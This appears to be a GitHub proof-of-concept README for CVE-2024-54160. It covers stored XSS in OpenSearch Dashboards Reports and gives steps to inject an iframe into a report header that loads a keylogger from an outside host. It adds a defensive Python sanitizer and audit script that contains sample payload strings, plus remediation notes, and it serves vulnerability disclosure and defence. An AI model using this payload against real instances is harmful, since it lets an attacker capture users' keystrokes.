
CVE-2024-54160 PoC — OpenSearch Dashboards Reports security vulnerability

Associated Vulnerability
Title: OpenSearch Dashboards Reports security vulnerability (CVE-2024-54160)
Description: OpenSearch Dashboards Reports is an open-source OpenSearch application used to export and automate PNG, PDF and CSV reports from OpenSearch Dashboards. OpenSearch Dashboards Reports version 2.19 has a security vulnerability: the Dashboards Reports module contains a cross-site scripting vulnerability.
Readme
# [CVE-2024-54160] Opensearch HTML Injection + Stored XSS

It was found that the Opensearch plugin called "reports" was vulnerable to HTML injection in version 2.18.0.
The report functionality allowed users to store HTML in the header and footer while creating a new report definition.
Below is a quick proof of concept where I stored an iframe in the header functionality that fetched a JavaScript keylogger from my local machine which recorded the keys typed by the user.

# PoC
1. Edit the keylogger.html file and add a local IP which python3 http.server is running on.
2. Save the keylogger.html
3. Start the python3 server with `python3 -m http.server` in the same path as the keylogger.html file
4. Go to Reports
5. Fill the required fields
6. Select PDF
7. Enable header or footer
8. Enter the iframe payload -> `<iframe src="http://<IP>:8000/keylogger.html">`
9. Click "Preview" - The keylogger should be loaded from the python server
10. Type something on the keyboard and watch the response in the python server

# Screenshot of the PoC in action
- The iframed content is rendered to the left (I know it's simple and ugly, but it works for a poc :) ).
- The logged keystrokes are shown to the right. (The keylogger PoC was not optimal since it missed some keystrokes though!)

![Screenshot 2024-12-17 141054](https://github.com/user-attachments/assets/bc066e1e-3878-4d3e-9eb2-449066569427)

# Remedial Action
This is remediated in Opensearch version 2.19, where the data passed through the header/footer functionality is sanitized with DOMPurify.

Release notes
https://github.com/opensearch-project/opensearch-build/blob/main/release-notes/opensearch-release-notes-2.19.0.md
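As an added example (not code from the dashboards-reporting project or from the PoC author), the Python script below shows the shape of the fix and of a defensive audit: an allow-list HTML sanitizer built on the standard library's html.parser, standing in for the DOMPurify call the 2.19.0 release adds, plus a small check that walks stored report definitions and flags header/footer values that carry active content. The tag/attribute allow-list, the 203.0.113.5 host, and the `report_params.core_params.header`/`footer` layout are assumptions made for the demonstration, not verified against the project's schema.

```python
"""Audit and sanitize HTML stored in report-definition header/footer fields.

Added example, not code from the dashboards-reporting project: an allow-list
sanitizer built on Python's html.parser, standing in for the DOMPurify call
the 2.19.0 fix adds. The allow-list and the report-definition layout below
are assumptions chosen for this demonstration.
"""
import html
from html.parser import HTMLParser

# Assumed allow-list: plain formatting only. Anything else is dropped.
ALLOWED_TAGS = {"p", "br", "b", "strong", "i", "em", "u", "h1", "h2", "h3",
                "ul", "ol", "li", "span", "div", "a"}
ALLOWED_ATTRS = {"a": {"href"}}   # every other attribute (style, class, ...) is dropped
VOID_TAGS = {"br"}
# Elements whose text content must not leak into the output either.
DROP_CONTENT_TAGS = {"script", "style", "iframe", "object", "noscript"}
SAFE_HREF_SCHEMES = ("http://", "https://", "mailto:")


class _Sanitizer(HTMLParser):
    """Re-serialises only allowed tags/attributes and records what it removed."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.findings = []
        self._drop_depth = 0   # >0 while inside a DROP_CONTENT_TAGS element

    def handle_starttag(self, tag, attrs):
        self._start(tag, attrs, self_closing=False)

    def handle_startendtag(self, tag, attrs):
        self._start(tag, attrs, self_closing=True)

    def _start(self, tag, attrs, self_closing):
        if tag not in ALLOWED_TAGS:
            self.findings.append(f"disallowed tag <{tag}>")
            if tag in DROP_CONTENT_TAGS and not self_closing:
                self._drop_depth += 1
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            if name.startswith("on"):
                self.findings.append(f"event handler attribute {name} on <{tag}>")
                continue
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue
            if name == "href" and not value.strip().lower().startswith(SAFE_HREF_SCHEMES):
                self.findings.append(f"unsafe href scheme on <{tag}>")
                continue
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT_TAGS and self._drop_depth:
            self._drop_depth -= 1
        elif tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        # Text is re-escaped on output, so it can never become markup.
        if not self._drop_depth:
            self.out.append(html.escape(data, quote=False))
    # Comments, doctype and processing instructions hit the base-class no-ops
    # and therefore never reach the output.


def sanitize_html(fragment):
    """Return (clean_html, findings) for one header/footer string."""
    p = _Sanitizer()
    p.feed(fragment)
    p.close()
    return "".join(p.out), p.findings


def audit_report_definition(definition):
    """Return {field: findings} for header/footer values carrying active content.

    Assumed layout (not checked against the project's schema):
    definition["report_params"]["core_params"]["header" | "footer"].
    """
    core = definition.get("report_params", {}).get("core_params", {})
    report = {}
    for field in ("header", "footer"):
        raw = core.get(field)
        if raw:
            _, findings = sanitize_html(raw)
            if findings:
                report[field] = findings
    return report


# Constructed sample definitions: one benign, one carrying the kind of payload
# the PoC describes (host and path are placeholders, not real infrastructure).
SAMPLE_DEFINITIONS = [
    {"report_params": {"report_name": "weekly-summary", "core_params": {
        "report_format": "pdf",
        "header": "<p><b>Weekly</b> summary</p>",
        "footer": "Internal use only"}}},
    {"report_params": {"report_name": "tampered", "core_params": {
        "report_format": "pdf",
        "header": '<iframe src="http://203.0.113.5:8000/keylogger.html"></iframe>',
        "footer": '<a href="javascript:alert(1)" onmouseover="x()">contact</a>'}}},
]

if __name__ == "__main__":
    for d in SAMPLE_DEFINITIONS:
        params = d["report_params"]
        print(params["report_name"], "->", audit_report_definition(d) or "clean")
        for field in ("header", "footer"):
            print("  ", field, "sanitized:", sanitize_html(params["core_params"][field])[0])
```

Running it reduces the iframe in the tampered definition to nothing and strips the javascript: link down to a plain anchor; the findings list is what you would surface from a detection rule or a pre-upgrade audit of saved report definitions on an instance still running 2.18.0. In a real deployment the sanitizer should be a maintained library such as DOMPurify, as the fix uses, rather than a hand-written one.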

# PR from Opensearch
https://github.com/opensearch-project/dashboards-reporting/pull/476

# Stored XSS
Version 2.17.9 was also found to be vulnerable to stored cross-site scripting in the same functionality (footer/header).

This is also fixed in version 2.19.0.

# CVE
https://www.cve.org/CVERecord?id=CVE-2024-54160
File Snapshot

/data/pocs/5c528e3830a3b27f2639a3e613cf0b4f4c92e983
├── keylogger.html (1.0K)
└── README.md (2.0K)
0 directories, 2 files